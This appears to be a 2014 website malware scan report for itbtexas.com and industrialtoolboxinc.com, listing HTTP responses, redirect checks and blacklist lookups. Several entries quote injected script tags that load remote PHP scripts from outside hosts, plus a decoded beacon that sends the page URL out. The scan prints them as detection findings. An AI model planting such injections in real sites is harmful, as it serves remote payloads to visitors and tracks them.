Scanned pages/files
| Request | Server response | Status |
http://itbtexas.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Tue, 17 Jun 2014 06:27:05 GMT Age: 0 Location: https://industrialtoolboxinc.com Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
https://industrialtoolboxinc.com/ | 200 OK Content-Length: 17575 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://aurea.biz/oldmodels/mkL3WqMX.php?id=85567784"></script> Decoded script: function () { if (c.f) { (new Image).src = a + "//" + c.l.replace(".js", ".png") + "&" + escape(e.location.href); } c.f = null; } /*** called setTimeout with function () { if (c.f) { (new Image).src = a + "//" + c.l.replace(".js", ".png") + "&" + escape(e.location.href); } c.f = null; }, 20000 */ function d() { c.P(b); e[g](b); } | ||
https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js | 200 OK Content-Length: 85925 Content-Type: text/javascript | clean |
https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.12/jquery-ui.min.js | 200 OK Content-Length: 199940 Content-Type: text/javascript | clean |
https://industrialtoolboxinc.com/js/plugins.php | 200 OK Content-Length: 66898 Content-Type: text/javascript | clean |
https://industrialtoolboxinc.com/js/common.js | 200 OK Content-Length: 14983 Content-Type: application/javascript | suspicious |
Suspicious code found /**/ document.write("<script type='text/javascript' src='http://rivastoner.com/rwhRH6WY.php'></"+ "script>"); | ||
http://itbtexas.com/skins/mauris/js/script.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Tue, 17 Jun 2014 06:27:12 GMT Age: 0 Location: https://industrialtoolboxinc.com/skins/mauris/js/script.js Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
https://industrialtoolboxinc.com/skins/mauris/js/script.js | 200 OK Content-Length: 2508 Content-Type: application/javascript | suspicious |
Suspicious code found /**/ document.write("<script type='text/javascript' src='http://rivastoner.com/rwhRH6WY.php'></"+ "script>"); | ||
http://itbtexas.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Tue, 17 Jun 2014 06:27:13 GMT Age: 0 Location: https://industrialtoolboxinc.com/test404page.js Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
https://industrialtoolboxinc.com/test404page.js | 404 Not Found Content-Length: 2811 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://radmand.de/VOdcsGNP.php?id=85566610"></script> | ||
http://industrialtoolboxinc.com/test404page.js | 404 Not Found Content-Length: 2811 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://radmand.de/VOdcsGNP.php?id=85566610"></script> | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: itbtexas.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=900
Connection: close
Date: Tue, 17 Jun 2014 06:27:05 GMT
Age: 0
Location: https://industrialtoolboxinc.com
Server: Microsoft-IIS/7.5
Content-Length: 0
Content-Type: text/html
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
...0 bytes of data.
GET / HTTP/1.1
Host: itbtexas.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=900
Connection: close
Date: Tue, 17 Jun 2014 06:27:05 GMT
Age: 0
Location: https://industrialtoolboxinc.com
Server: Microsoft-IIS/7.5
Content-Length: 0
Content-Type: text/html
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: itbtexas.com
Referer: http://www.google.com/search?q=itbtexas.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: itbtexas.com
Referer: http://www.google.com/search?q=itbtexas.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=itbtexas.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://itbtexas.com/
Result: itbtexas.com is not infected or malware details are not published yet.
Result: itbtexas.com is not infected or malware details are not published yet.